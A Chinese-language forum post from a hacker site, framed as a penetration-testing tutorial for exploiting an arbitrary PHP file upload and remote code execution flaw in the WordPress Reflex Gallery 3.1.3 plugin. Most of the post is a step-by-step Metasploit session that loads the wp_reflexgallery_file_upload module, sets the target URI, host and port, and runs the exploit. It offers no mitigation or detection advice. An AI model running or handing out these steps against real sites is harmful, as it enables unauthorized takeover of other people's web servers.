渗透测试实战教程:如何利用WordPress插件Reflex Gallery的文件上传漏洞【附上漏洞利用方法】

zevseo
3620zevseo大版主
2018-09-11 02:51:39
3620 2018-09-11 02:51:39
此模块利用WordPress Reflex Gallery 3.1.3版中的任意PHP代码文件上传漏洞。该漏洞允许任意文件上传和远程代码执行
利用目标
Reflex Gallery版本3.1.3
需求
攻击者:kali Linux
受害者PC:已安装WordPress
打开Kali终端类型  msfconsole

描述:如何利用WordPress插件Reflex Gallery的文件上传漏洞


现在输入  exploit use / unix / webapp / wp_ reflexgallery_file_upload
msf exploit (wp_reflexgallery_file_upload)>set targeturi /wordpress
msf exploit (wp_reflexgallery_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_reflexgallery_file_upload)>set rport 80
msf exploit (wp_reflexgallery_file_upload)>exploit  
如何利用WordPress插件Reflex Gallery的文件上传漏洞

描述:如何利用WordPress插件Reflex Gallery的文件上传漏洞


本文标题:渗透测试实战教程:如何利用WordPress插件Reflex Gallery的文件上传漏洞【附上漏洞利用方法】
本文作者:zevseo
本文来自:蚁安黑客官网
转载请注明本文链接:http://www.mayidui.net/t2314.html
游客
登录后才可以回帖,登录 或者 注册
weixin
蚁安蚂蚁堆

找工具、找教程、找朋友,你想不到的这儿都有!

微信号:baiyiwangan